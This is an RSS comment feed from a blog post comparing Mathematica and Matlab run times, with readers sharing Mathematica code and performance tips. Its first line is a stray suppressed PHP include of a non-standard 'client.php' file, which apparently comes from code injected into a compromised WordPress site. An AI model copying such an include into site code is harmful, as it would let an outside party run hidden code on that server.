@include( ABSPATH . WPINC . '/client.php');<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Mathematica, 2.5 hours.  Matlab, 47 seconds.  Not impressed, WRI, not impressed.</title>
	<atom:link href="http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/feed/" rel="self" type="application/rss+xml" />
	<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/</link>
	<description>Threads both sad and humoristic / небрежный плод моих забав ...</description>
	<lastBuildDate>Mon, 17 Sep 2012 08:06:41 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Greg Klopper</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-263</link>
		<dc:creator>Greg Klopper</dc:creator>
		<pubDate>Fri, 07 Jan 2011 18:38:09 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-263</guid>
		<description>ALWAYS compile numeric functions. The performance boost is phenomenal to say the least. I&#039;m not even talking about C compiling in version 8, just using the built-in Compile function to get away from symbolic/interpreted code. Also, give numeric attribute to your numeric functions. That way the interpreter knows that given a set of numbers, the result will never be symbolic, but also a number.

But comparing a true symbolic calculation engine against a purely numeric one is rather unfair. You can add extra effort to ask Mathematica to treat your input as purely numeric (like NIntegrate), but good luck getting Matlab to do some of the fascinating things that Mathematica can do out of the box (even if they take a bit of time, because a symbol&#039;s representation and checking its various values under various conditions takes longer).</description>
		<content:encoded><![CDATA[<p>ALWAYS compile numeric functions. The performance boost is phenomenal to say the least. I'm not even talking about C compiling in version 8, just using the built-in Compile function to get away from symbolic/interpreted code. Also, give numeric attribute to your numeric functions. That way the interpreter knows that given a set of numbers, the result will never be symbolic, but also a number.</p>
<p>But comparing a true symbolic calculation engine against a purely numeric one is rather unfair. You can add extra effort to ask Mathematica to treat your input as purely numeric (like NIntegrate), but good luck getting Matlab to do some of the fascinating things that Mathematica can do out of the box (even if they take a bit of time, because a symbol's representation and checking its various values under various conditions takes longer).</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: green tea</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-34</link>
		<dc:creator>green tea</dc:creator>
		<pubDate>Sat, 08 Aug 2009 18:57:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-34</guid>
		<description>I found a solution to remove the bottleneck.

SetSystemOptions[&quot;CatchMachineUnderflow&quot; -&gt; False];

prepend this to my previous code.</description>
		<content:encoded><![CDATA[<p>I found a solution to remove the bottleneck.</p>
<p>SetSystemOptions["CatchMachineUnderflow" -&gt; False];</p>
<p>prepend this to my previous code.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: green tea</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-32</link>
		<dc:creator>green tea</dc:creator>
		<pubDate>Sat, 08 Aug 2009 07:38:29 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-32</guid>
		<description>what about this code?

I translated MATLAB code to Mathematica code directly.

A bottleneck is in MagneticSlabTransmission.

If xLim=54, underflow occurs in MagneticSlabTransmission,

and Mathematica will use arbitrary precision arithmetic, not FPU.



trapz[x_, y_] := (x[[2 ;;]] - x[[;; -2]]).(y[[2 ;;]] + y[[;; -2]])/2;

fftshift[x_] := RotateRight[x, Quotient[Length[x], 2]];

PerformDft1[fh_, xLim_, smpRateX_] :=
 Module[{step, Nw, kLim, kstep, xvec, kvec, data, dataTransform},
  step = smpRateX^-1;
  Nw = 2*xLim*smpRateX;
  kLim = smpRateX;
  kstep = (2*xLim)^-1;
  xvec = Range[-xLim, xLim - step, step];
  kvec = Range[-kLim/2, kLim/2 - kstep, kstep];
  data = fftshift[fh[xvec]];
  dataTransform = step*Fourier[data, FourierParameters -&gt; {1, -1}];
  {dataTransform, kvec}
  ];

TESlabTransmissionNice[kx_, mu11_, d_] := 
 Module[{eps, m0, epar, mperp, mu1, kz0, kz1, kz2},
  eps = $MachineEpsilon;
  m0 = 1. + eps*I;
  epar = 1. + eps*I;
  mperp = 1.;
  mu1 = mu11 + eps*I;
  kz0 = Sqrt[m0 - kx^2];
  kz1 = Sqrt[mu1*(epar - kx^2/mperp)];
  kz2 = kz1*m0/(kz0*mu1);
  (Cos[d*kz1] - (kz2 + kz2^(-1))*Sin[d*kz1]*I/2)^(-1)
  ];

MagneticSlabTransmission[kx_, mu1_, d_] :=
 With[{h = 0.5},
  Exp[-4*Pi*h*Sqrt[kx^2 - 1 + 0.*I]]*
   TESlabTransmissionNice[kx, mu1, 2*Pi*d](* 
  unpacking occurs . bottleneck *)
  ];

CostFunctionIntegrand[fh_] :=
 Module[{xLim, xSmpRate, dftStruct, absxform},
  xLim = 100.;
  xSmpRate = 100.;
  dftStruct = PerformDft1[fh, xLim, xSmpRate];
  absxform = Abs[fftshift[dftStruct[[1]]]];
  {dftStruct[[2]], absxform/Max[absxform]}
  ];

Timing[
 outfile = OpenWrite[&quot;costfn1.dat&quot;];
 Do[
  Write[outfile, {d, mpp, 
    trapz @@ 
     CostFunctionIntegrand[MagneticSlabTransmission[#, mpp, d] &amp;]}],
  {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}];
 Close[outfile];
 ]</description>
		<content:encoded><![CDATA[<p>what about this code?</p>
<p>I translated MATLAB code to Mathematica code directly.</p>
<p>A bottleneck is in MagneticSlabTransmission.</p>
<p>If xLim=54, underflow occurs in MagneticSlabTransmission,</p>
<p>and Mathematica will use arbitrary precision arithmetic, not FPU.</p>
<p>trapz[x_, y_] := (x[[2 ;;]] - x[[;; -2]]).(y[[2 ;;]] + y[[;; -2]])/2;</p>
<p>fftshift[x_] := RotateRight[x, Quotient[Length[x], 2]];</p>
<p>PerformDft1[fh_, xLim_, smpRateX_] :=<br />
 Module[{step, Nw, kLim, kstep, xvec, kvec, data, dataTransform},<br />
  step = smpRateX^-1;<br />
  Nw = 2*xLim*smpRateX;<br />
  kLim = smpRateX;<br />
  kstep = (2*xLim)^-1;<br />
  xvec = Range[-xLim, xLim - step, step];<br />
  kvec = Range[-kLim/2, kLim/2 - kstep, kstep];<br />
  data = fftshift[fh[xvec]];<br />
  dataTransform = step*Fourier[data, FourierParameters -&gt; {1, -1}];<br />
  {dataTransform, kvec}<br />
  ];</p>
<p>TESlabTransmissionNice[kx_, mu11_, d_] :=<br />
 Module[{eps, m0, epar, mperp, mu1, kz0, kz1, kz2},<br />
  eps = $MachineEpsilon;<br />
  m0 = 1. + eps*I;<br />
  epar = 1. + eps*I;<br />
  mperp = 1.;<br />
  mu1 = mu11 + eps*I;<br />
  kz0 = Sqrt[m0 - kx^2];<br />
  kz1 = Sqrt[mu1*(epar - kx^2/mperp)];<br />
  kz2 = kz1*m0/(kz0*mu1);<br />
  (Cos[d*kz1] - (kz2 + kz2^(-1))*Sin[d*kz1]*I/2)^(-1)<br />
  ];</p>
<p>MagneticSlabTransmission[kx_, mu1_, d_] :=<br />
 With[{h = 0.5},<br />
  Exp[-4*Pi*h*Sqrt[kx^2 - 1 + 0.*I]]*<br />
   TESlabTransmissionNice[kx, mu1, 2*Pi*d](*<br />
  unpacking occurs . bottleneck *)<br />
  ];</p>
<p>CostFunctionIntegrand[fh_] :=<br />
 Module[{xLim, xSmpRate, dftStruct, absxform},<br />
  xLim = 100.;<br />
  xSmpRate = 100.;<br />
  dftStruct = PerformDft1[fh, xLim, xSmpRate];<br />
  absxform = Abs[fftshift[dftStruct[[1]]]];<br />
  {dftStruct[[2]], absxform/Max[absxform]}<br />
  ];</p>
<p>Timing[<br />
 outfile = OpenWrite["costfn1.dat"];<br />
 Do[<br />
  Write[outfile, {d, mpp,<br />
    trapz @@<br />
     CostFunctionIntegrand[MagneticSlabTransmission[#, mpp, d] &amp;]}],<br />
  {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}];<br />
 Close[outfile];<br />
 ]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: attempt_to_blog++ : The nice thing about Wolfram Research is&#8230;</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-9</link>
		<dc:creator>attempt_to_blog++ : The nice thing about Wolfram Research is&#8230;</dc:creator>
		<pubDate>Wed, 08 Jul 2009 09:21:40 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-9</guid>
		<description>[...] that the product of his life&#8217;s work, basically, blows, the good folks at Wolfram actually went and optimized my code, making it run an order of magnitude faster (although still an order of magnitude slower than [...]</description>
		<content:encoded><![CDATA[<p>[...] that the product of his life&#8217;s work, basically, blows, the good folks at Wolfram actually went and optimized my code, making it run an order of magnitude faster (although still an order of magnitude slower than [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: dnquark</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-7</link>
		<dc:creator>dnquark</dc:creator>
		<pubDate>Tue, 07 Jul 2009 00:24:38 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-7</guid>
		<description>My timing, on Solaris 1.5 GHz server, same version of Mathematica:
posted code, 8 mins 7 seconds;
replace Integrate with NIntegrate: 5m35s

Matlab?  48 seconds.  still.  
Now, I have to disqualify the NIntegrate results, because for several values of parameters, they seem to be numerically different from the Integrate[] or from matlab&#039;s trapz by about 5%.  (Matlab agrees with the Integrate[] approach to within 0.0003%)</description>
		<content:encoded><![CDATA[<p>My timing, on Solaris 1.5 GHz server, same version of Mathematica:<br />
posted code, 8 mins 7 seconds;<br />
replace Integrate with NIntegrate: 5m35s</p>
<p>Matlab?  48 seconds.  still.<br />
Now, I have to disqualify the NIntegrate results, because for several values of parameters, they seem to be numerically different from the Integrate[] or from matlab's trapz by about 5%.  (Matlab agrees with the Integrate[] approach to within 0.0003%)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Daniel Lichtblau</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-6</link>
		<dc:creator>Daniel Lichtblau</dc:creator>
		<pubDate>Mon, 06 Jul 2009 23:22:16 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-6</guid>
		<description>The bottlenecks are:

(1) Use of exact inputs that will slow some functions (trigs, Sqrt[], and so on).

(2) Repeated omputation of a function that is mapped over a list. Much faster to have the function take a list argument and compute a list result. This is in part because we can now work with the vector as a packed array, and do not need to break it up element-by-element.

Here is the faster code. It runs in about 80 seconds on my machine.
&lt;code&gt;
FftShift1D[x_] := Module[{n = Ceiling[Length[x]/2]},
  RotateRight[x, n]]

PerformDft1[func_, xLim_, smpRateX_] :=
 Module[{kLim = smpRateX, step = 1/smpRateX,
   kstep = 1/(2*xLim), data, dataTransform, xvec, kvec},
  xvec = Range[-xLim, xLim - step, step];
  kvec = Range[-kLim/2, kLim/2 - kstep, kstep];
  data = FftShift1D[func[N[xvec]]];
  dataTransform = Fourier[data, FourierParameters -&gt; {1, -1}]/smpRateX;
  {dataTransform, kvec, 1/kstep}]

TESlabTransmissionNice[kx_, mu11_, d_] :=
 Module[{m0, mu1, kz0, kz1, epar, mperp = 1., eps = 10.^(-20)},
  m0 = 1. + I*eps;
  mu1 = mu11 + I*eps;
  epar = 1. + I*eps;
  kz0 = Sqrt[m0 - kx^2];
  kz1 = Sqrt[mu1*(epar - kx^2/mperp)];
  1/(Cos[d*kz1] -
     I/2.*((mu1*kz0)/(m0*kz1) + (m0*kz1)/(mu1*kz0))*Sin[d*kz1])]

MagneticSlabTransmission[kx_, mupp_, d_] :=
  Module[{mu1 = -1. + I*mupp, h = 0.5},
   Exp[-4*Pi*h*Sqrt[kx^2 - 1.]]*
    TESlabTransmissionNice[kx, mu1, 2.*Pi*d]];

CostFunctionIntegrand[fn_, print_: False] :=
 Module[{xLim = 100, xSmpRate = 100, xform, kvec,
   srk}, {xform, kvec, srk} = PerformDft1[fn, N[xLim], N[xSmpRate]];
  xform = FftShift1D@xform;
  If[print,
   Print[ListPlot[Re[Transpose[{kvec, xform}]],
     PlotRange -&gt; {{-1, 1}, All}]];
   Print[&quot;k sampling rate: &quot;, srk];];
  Transpose[{N[kvec], Abs[xform]/Max[Abs[xform]]}]]

ComputeCostFunction[fn_] :=
 Module[{integrand, min, max}, integrand = CostFunctionIntegrand[fn];
  min = Min[integrand[[All, 1]]];
  max = Max[integrand[[All, 1]]];
  Integrate[Interpolation[integrand,InterpolationOrder-&gt;2][x],{x,
  min,max}]
  ]

ComputeCostAndOutput[d_, mpp_, fname_] :=
  PutAppend[{d, mpp,
    ComputeCostFunction[MagneticSlabTransmission[#, mpp, d] &amp;]},
   fname];

Timing[Map[((ComputeCostAndOutput[#1, #2,
         &quot;/tmp/costfn1.dat&quot;] &amp;) @@ #) &amp;,
   Table[{d, mpp}, {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}], {2}];]

We can furthermore replace Integrate[...] by

NIntegrate[
   Interpolation[integrand, InterpolationOrder -&gt; 2][x], {x, min,
    max}, PrecisionGoal -&gt; 2, AccuracyGoal -&gt; 2, MaxRecursion -&gt; 6,
   MaxPoints -&gt; Ceiling[Length[integrand[[All, 1]]]]/2,
   Method -&gt; {&quot;Trapezoidal&quot;, &quot;SymbolicProcessing&quot; -&gt; None}]

This variant runs in under a minute on my machine (3 Ghz, Linux, version 7.0.1 Mathematica).

In[8]:= Timing[
 Map[((ComputeCostAndOutput[#1, #2, &quot;/tmp/costfn1.dat&quot;] &amp;) @@ #) &amp;,
   Table[{d, mpp}, {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}], {2}];]

Out[8]= {50.1584, Null}&lt;/code&gt;

Locating the bottlenecks was in part knowing to look for (1) above, coupled with use of Print[] statements to isolate (2).

Daniel Lichtblau
Wolfram Research</description>
		<content:encoded><![CDATA[<p>The bottlenecks are:</p>
<p>(1) Use of exact inputs that will slow some functions (trigs, Sqrt[], and so on).</p>
<p>(2) Repeated omputation of a function that is mapped over a list. Much faster to have the function take a list argument and compute a list result. This is in part because we can now work with the vector as a packed array, and do not need to break it up element-by-element.</p>
<p>Here is the faster code. It runs in about 80 seconds on my machine.<br />
<code><br />
FftShift1D[x_] := Module[{n = Ceiling[Length[x]/2]},<br />
  RotateRight[x, n]]</p>
<p>PerformDft1[func_, xLim_, smpRateX_] :=<br />
 Module[{kLim = smpRateX, step = 1/smpRateX,<br />
   kstep = 1/(2*xLim), data, dataTransform, xvec, kvec},<br />
  xvec = Range[-xLim, xLim - step, step];<br />
  kvec = Range[-kLim/2, kLim/2 - kstep, kstep];<br />
  data = FftShift1D[func[N[xvec]]];<br />
  dataTransform = Fourier[data, FourierParameters -&gt; {1, -1}]/smpRateX;<br />
  {dataTransform, kvec, 1/kstep}]</p>
<p>TESlabTransmissionNice[kx_, mu11_, d_] :=<br />
 Module[{m0, mu1, kz0, kz1, epar, mperp = 1., eps = 10.^(-20)},<br />
  m0 = 1. + I*eps;<br />
  mu1 = mu11 + I*eps;<br />
  epar = 1. + I*eps;<br />
  kz0 = Sqrt[m0 - kx^2];<br />
  kz1 = Sqrt[mu1*(epar - kx^2/mperp)];<br />
  1/(Cos[d*kz1] -<br />
     I/2.*((mu1*kz0)/(m0*kz1) + (m0*kz1)/(mu1*kz0))*Sin[d*kz1])]</p>
<p>MagneticSlabTransmission[kx_, mupp_, d_] :=<br />
  Module[{mu1 = -1. + I*mupp, h = 0.5},<br />
   Exp[-4*Pi*h*Sqrt[kx^2 - 1.]]*<br />
    TESlabTransmissionNice[kx, mu1, 2.*Pi*d]];</p>
<p>CostFunctionIntegrand[fn_, print_: False] :=<br />
 Module[{xLim = 100, xSmpRate = 100, xform, kvec,<br />
   srk}, {xform, kvec, srk} = PerformDft1[fn, N[xLim], N[xSmpRate]];<br />
  xform = FftShift1D@xform;<br />
  If[print,<br />
   Print[ListPlot[Re[Transpose[{kvec, xform}]],<br />
     PlotRange -&gt; {{-1, 1}, All}]];<br />
   Print["k sampling rate: ", srk];];<br />
  Transpose[{N[kvec], Abs[xform]/Max[Abs[xform]]}]]</p>
<p>ComputeCostFunction[fn_] :=<br />
 Module[{integrand, min, max}, integrand = CostFunctionIntegrand[fn];<br />
  min = Min[integrand[[All, 1]]];<br />
  max = Max[integrand[[All, 1]]];<br />
  Integrate[Interpolation[integrand,InterpolationOrder-&gt;2][x],{x,<br />
  min,max}]<br />
  ]</p>
<p>ComputeCostAndOutput[d_, mpp_, fname_] :=<br />
  PutAppend[{d, mpp,<br />
    ComputeCostFunction[MagneticSlabTransmission[#, mpp, d] &amp;]},<br />
   fname];</p>
<p>Timing[Map[((ComputeCostAndOutput[#1, #2,<br />
         "/tmp/costfn1.dat"] &amp;) @@ #) &amp;,<br />
   Table[{d, mpp}, {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}], {2}];]</p>
<p>We can furthermore replace Integrate[...] by</p>
<p>NIntegrate[<br />
   Interpolation[integrand, InterpolationOrder -&gt; 2][x], {x, min,<br />
    max}, PrecisionGoal -&gt; 2, AccuracyGoal -&gt; 2, MaxRecursion -&gt; 6,<br />
   MaxPoints -&gt; Ceiling[Length[integrand[[All, 1]]]]/2,<br />
   Method -&gt; {"Trapezoidal", "SymbolicProcessing" -&gt; None}]</p>
<p>This variant runs in under a minute on my machine (3 Ghz, Linux, version 7.0.1 Mathematica).</p>
<p>In[8]:= Timing[<br />
 Map[((ComputeCostAndOutput[#1, #2, "/tmp/costfn1.dat"] &amp;) @@ #) &amp;,<br />
   Table[{d, mpp}, {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}], {2}];]</p>
<p>Out[8]= {50.1584, Null}</code></p>
<p>Locating the bottlenecks was in part knowing to look for (1) above, coupled with use of Print[] statements to isolate (2).</p>
<p>Daniel Lichtblau<br />
Wolfram Research</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: dnquark</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-5</link>
		<dc:creator>dnquark</dc:creator>
		<pubDate>Mon, 06 Jul 2009 21:35:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-5</guid>
		<description>Interesting.   I figured there&#039;d be room for some optimization, and I&#039;m really glad somebody looked into it.  Doesn&#039;t make me feel much better about Mathematica, though.  If I don&#039;t use Modules[] when developing code, my namespace is littered with globals, which eventually blows up in my face.  And wrapping every possible numeric constant in N[] (or using decimals) gets tiring after a while.</description>
		<content:encoded><![CDATA[<p>Interesting.   I figured there'd be room for some optimization, and I'm really glad somebody looked into it.  Doesn't make me feel much better about Mathematica, though.  If I don't use Modules[] when developing code, my namespace is littered with globals, which eventually blows up in my face.  And wrapping every possible numeric constant in N[] (or using decimals) gets tiring after a while.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: JonyEpsilon</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-3</link>
		<dc:creator>JonyEpsilon</dc:creator>
		<pubDate>Mon, 06 Jul 2009 11:54:59 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-3</guid>
		<description>FWIW, I had a crack at speeding up the Mathematica code. You can more than double the speed by adding periods to the numeric constants, which forces Mathematica into doing approximate rather than exact numerics. You can get about another factor of two by replacing the core functions in the integrand with pure functions and removing the modules. (Mathematica is almost always fastest with pure functions as it then doesn&#039;t have to invoke the pattern matcher on the arguments. Modules involve some significant symbolic name-mangling and are pretty slow.)

It&#039;s still nowhere near 47 seconds, but I thought you might be interested anyway!


Jony</description>
		<content:encoded><![CDATA[<p>FWIW, I had a crack at speeding up the Mathematica code. You can more than double the speed by adding periods to the numeric constants, which forces Mathematica into doing approximate rather than exact numerics. You can get about another factor of two by replacing the core functions in the integrand with pure functions and removing the modules. (Mathematica is almost always fastest with pure functions as it then doesn't have to invoke the pattern matcher on the arguments. Modules involve some significant symbolic name-mangling and are pretty slow.)</p>
<p>It's still nowhere near 47 seconds, but I thought you might be interested anyway!</p>
<p>Jony</p>
]]></content:encoded>
	</item>
</channel>
</rss>
